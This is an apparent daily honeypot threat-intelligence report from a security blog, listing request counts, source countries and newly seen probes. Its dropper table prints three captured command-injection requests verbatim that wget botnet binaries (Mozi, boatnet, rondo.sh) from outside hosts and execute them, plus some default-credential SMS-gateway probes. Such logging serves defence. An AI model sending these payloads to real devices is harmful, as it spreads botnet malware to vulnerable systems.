Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-06-24

·327 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-24
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 14 new requests that have never been observed before (these were added to the monitored request database.).

A total of 700 requests were recorded during the day, originating from 3 different countries, with a peak of 289 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
144.172.97.104POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.32%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1
122.97.212.38GET /shell?cd+/tmp;rm+-rf+*;wget+http://102.33.47.108:41507/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
45.135.194.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
821\x00\x0E8x\x13\x0F\xBF\xEF\xD1X~\x00\x00\x00\x00\x00
901GET /cgi-bin/sms_send?username=user1&password=user1&number=003584573994612&text=test HTTP/1.1
991GET /cgi-bin/sms_send?username=user1&password=user_pass&number=003584573994612&text=test HTTP/1.1
1001GET /cgi-bin/sms_send?username=user1&password=p8xr6tINNA0eGBIY&number=003584573994612&text=test HTTP/1.1
1691\x00\x0E82\x9E4F\x89\x80n\xB7\x00\x00\x00\x00\x00
1821\x00\x0E8\x87qJ\xD2\xCD\xDF\xE66\x00\x00\x00\x00\x00
1831\x00\x0E\x08\x87qJ\xD2\xCD\xDF\xE66\x00\x00\x00\x00\x00
1841\x05d\x05\xC9\x00\x00\x00\x006L\x05d\x05\xC9\x01\x00\x00\x00\xDE\x8E\x05d\x05\xC9\x02\x00\x00\x00\x9F\x84\x05d\x05\xC9\x03\x00\x00\x00wF\x05d\x05\xC9\x04\x00\x00\x00\x1D\x90\x05d\x05\xC9\x05\x00\x00\x00\xF5R\x05d\x05\xC9\x06\x00\x00\x00\xB4X\x05d\x05\xC9\x07\x00\x00\x00\x5C\x9A\x05d\x05\xC9\x08\x00\x00\x00\x19\xB9\x05d\x05\xC9\x09\x00\x00\x00\xF1{\x05d\x05\xC9
1941\x00\x0E8\xB4\xB4\xBB\xA0\xFC\xB11l\x00\x00\x00\x00\x00
2091\x00\x0E\x08M\x1D\xA0fG\xC5\xEF\xAF\x00\x00\x00\x00\x00
2101\x00\x0E8M\x1D\xA0fG\xC5\xEF\xAF\x00\x00\x00\x00\x00
2111\x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/d\x8A\xF7\x7F\x00\x00\x00\xFA\x1D\xED\x1C\x00\x00\x00\xE0\x81\x89\x8A\xF7\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01
2171\x00\x0E8\xD3L\xD6\xD9\xBBE\x9A\xEB\x00\x00\x00\x00\x00
2221\x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\x9F\x83\xF7\x7F\x00\x00\x10\xF5=\x82`\x00\x00\x00\xE0\x81\xC4\x83\xF7\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01

country_iso_code
#

number_of_occurencecountry_iso_code
0289US
164CN
246BG
345DE
445NL
524JP
621IN
718CA
818SG
918GB
1016ID
119LT
127RU
137BR
146PL
156CH
166ZA
176IL
186PT
195SC
204BE
214AO
224UA
233FR
243KZ
253AU
262MD
272KR
282HK
292KW
302SE
312IE
321MC
331ES
341KH
351VE
361AZ

Related

Report: 2025-06-23
·838 words
Repport Daily
Report: 2025-06-22
·398 words
Repport Daily
Report: 2025-06-21
·525 words
Repport Daily